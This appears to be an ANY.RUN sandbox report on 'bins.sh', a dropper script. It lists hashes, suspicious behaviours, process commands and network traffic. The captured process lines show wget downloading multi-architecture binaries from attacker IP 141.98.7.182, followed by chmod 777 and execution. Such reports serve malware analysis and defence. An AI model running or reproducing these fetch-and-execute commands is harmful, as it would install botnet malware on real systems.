download:

/bins.sh

Full analysis: https://app.any.run/tasks/509182b1-3bc8-4994-be17-d5001e459b69
Verdict: Malicious activity
Analysis date: June 01, 2024, 07:10:52
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

C9D4FA3B9FA7C3970B75CB58314FEB3A

SHA1:

97102BD8DAA11042F5EACD59F3FE78FB7123BB4E

SHA256:

9E674D9B3BE74AB06461B1DE8D120360B271E4A5380F2B7F81FF5A327B1FA2D2

SSDEEP:

48:oxLxvYrHwcWt1rQxdzKrF+qo9rC2aE5IV37Fg7bpZxyRhzdzvzQzALwDKNt8WSYP:olxvYrHwcWHrQxdzKrF+qo9rC2aE5a35

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 11957)
      • modprobe (PID: 11969)
      • modprobe (PID: 11981)
      • modprobe (PID: 11987)
      • modprobe (PID: 11975)
      • modprobe (PID: 11963)
      • modprobe (PID: 11993)

    • Modifies file or directory owner

      • sudo (PID: 11947)

    • Executes commands using command-line interpreter

      • sudo (PID: 11950)

    • Uses wget to download content

      • bash (PID: 11951)

    • Connects to the server without a host name

      • wget (PID: 11953)
      • wget (PID: 11989)
      • wget (PID: 11995)

    • Potential Corporate Privacy Violation

      • wget (PID: 11959)
      • wget (PID: 11965)
      • wget (PID: 11953)
      • wget (PID: 11977)
      • wget (PID: 11983)
      • wget (PID: 11989)
      • wget (PID: 11971)

    • Checks DMI information (probably VM detection)

      • pipewire (PID: 12155)
      • gnome-shell (PID: 12336)

    • Connects to unusual port

      • x86.pawnedbymd5hashguy (PID: 12000)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • fusermount3 (PID: 12268)
      • gnome-shell (PID: 12336)
      • fusermount3 (PID: 12017)

    • Intercepts program crashes

      • apport (PID: 12008)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
351
Monitored processes
138
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start sh no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget cat no specs chmod no specs bash no specs modprobe no specs bash no specs wget cat no specs chmod no specs bash no specs modprobe no specs bash no specs wget cat no specs chmod no specs bash no specs modprobe no specs bash no specs wget cat no specs chmod no specs bash no specs modprobe no specs bash no specs wget cat no specs chmod no specs bash no specs modprobe no specs bash no specs wget cat no specs chmod no specs bash no specs modprobe no specs bash no specs wget cat no specs chmod no specs bash no specs modprobe no specs bash no specs wget cat no specs chmod no specs x86.pawnedbymd5hashguy no specs bash no specs x86.pawnedbymd5hashguy no specs x86.pawnedbymd5hashguy x86.pawnedbymd5hashguy no specs snap no specs apport default no specs fusermount3 no specs gdm-session-worker no specs snap-seccomp no specs gnome-session-ctl no specs gnome-session-ctl no specs default no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gdbus no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs default no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd-user-runtime-dir no specs systemd no specs systemd no specs snap-seccomp no specs 30-systemd-environment-d-generator no specs systemd no specs systemd-xdg-autostart-generator no specs snap-confine no specs snap-confine no specs snap-seccomp no specs pipewire no specs systemd no specs systemd no specs systemd no specs snap no specs dark-theme-migration.sh no specs gsettings no specs fusermount3 no specs 5 no specs dash no specs snap-confine no specs snap-confine no specs snap-seccomp no specs unity-gnome-shell-migration.17.10.py no specs snap-confine no specs snap-confine no specs gnome-shell no specs snap-confine no specs snap-confine no specs dbus-daemon no specs xdg-permission-store no specs gsd-media-keys no specs gnome-session-binary no specs gsd-print-notifications no specs gsd-printer no specs gvfs-mtp-volume-monitor no specs ibus-engine-m17n no specs systemd no specs ibus-dconf no specs dbus-daemon no specs ibus-portal no specs dbus-daemon no specs dbus-daemon no specs goa-identity-service no specs ibus-engine-mozc no specs ibus-dconf no specs ibus-daemon no specs ibus-x11 no specs dbus-daemon no specs dbus-daemon no specs sh no specs dbus-update-activation-environment no specs gnome-session-ctl no specs fprintd no specs gdm-session-worker no specs gdm-session-worker no specs

Process information

PID
CMD
Path
Indicators
Parent process
11946/bin/sh -c "sudo chown user /tmp/bins\.sh && chmod +x /tmp/bins\.sh && DISPLAY=:0 sudo -iu user /tmp/bins\.sh "/bin/shany-guest-agent
User:
user
Integrity Level:
UNKNOWN
11947sudo chown user /tmp/bins.sh/usr/bin/sudosh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
11948chown user /tmp/bins.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
11949chmod +x /tmp/bins.sh/usr/bin/chmodsh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
11950sudo -iu user /tmp/bins.sh/usr/bin/sudosh
User:
user
Integrity Level:
UNKNOWN
11951-bash --login -c \/tmp\/bins\.sh/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
11952/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
11953wget http://141.98.7.182/arm.pawnedbymd5hashguy/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
11954cat arm.pawnedbymd5hashguy/usr/bin/catbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
11955chmod 777 arm.pawnedbymd5hashguy/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
11953wget/tmp/arm.pawnedbymd5hashguy
MD5:
SHA256:
11959wget/tmp/arm5.pawnedbymd5hashguy
MD5:
SHA256:
11965wget/tmp/arm6.pawnedbymd5hashguy
MD5:
SHA256:
11971wget/tmp/arm7.pawnedbymd5hashguy
MD5:
SHA256:
11977wget/tmp/mips.pawnedbymd5hashguy
MD5:
SHA256:
11983wget/tmp/mipsel.pawnedbymd5hashguy
MD5:
SHA256:
11989wget/tmp/powerpc.pawnedbymd5hashguy
MD5:
SHA256:
11995wget/tmp/x86.pawnedbymd5hashguy
MD5:
SHA256:
12008apport/var/log/apport.log
MD5:
SHA256:
12008apport/run/apport.lock
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
23
DNS requests
11
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.17:80
http://connectivity-check.ubuntu.com/
unknown
11953
wget
GET
200
141.98.7.182:80
http://141.98.7.182/arm.pawnedbymd5hashguy
unknown
11965
wget
GET
200
141.98.7.182:80
http://141.98.7.182/arm6.pawnedbymd5hashguy
unknown
11959
wget
GET
200
141.98.7.182:80
http://141.98.7.182/arm5.pawnedbymd5hashguy
unknown
11971
wget
GET
200
141.98.7.182:80
http://141.98.7.182/arm7.pawnedbymd5hashguy
unknown
11977
wget
GET
200
141.98.7.182:80
http://141.98.7.182/mips.pawnedbymd5hashguy
unknown
11983
wget
GET
200
141.98.7.182:80
http://141.98.7.182/mipsel.pawnedbymd5hashguy
unknown
11989
wget
GET
200
141.98.7.182:80
http://141.98.7.182/powerpc.pawnedbymd5hashguy
unknown
11995
wget
GET
200
141.98.7.182:80
http://141.98.7.182/x86.pawnedbymd5hashguy
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
470
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.17:80
Canonical Group Limited
GB
unknown
185.125.190.96:80
Canonical Group Limited
GB
unknown
212.102.56.179:443
odrs.gnome.org
Datacamp Limited
DE
unknown
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
unknown
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
unknown
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
unknown
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
unknown
11953
wget
141.98.7.182:80
ASN-QUADRANET-GLOBAL
BG
unknown
11959
wget
141.98.7.182:80
ASN-QUADRANET-GLOBAL
BG
unknown

DNS requests

Domain
IP
Reputation
odrs.gnome.org
  • 212.102.56.179
  • 156.146.33.14
  • 195.181.175.16
  • 195.181.175.40
  • 156.146.33.137
  • 212.102.56.182
  • 156.146.33.140
  • 195.181.170.18
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::10
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::22
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::17
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::11
unknown
api.snapcraft.io
  • 185.125.188.58
  • 185.125.188.55
  • 185.125.188.54
  • 185.125.188.59
unknown
45.100.168.192.in-addr.arpa
unknown
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::22
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::97
  • 2001:67c:1562::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::98
  • 2620:2d:4002:1::197
unknown

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
/bins.sh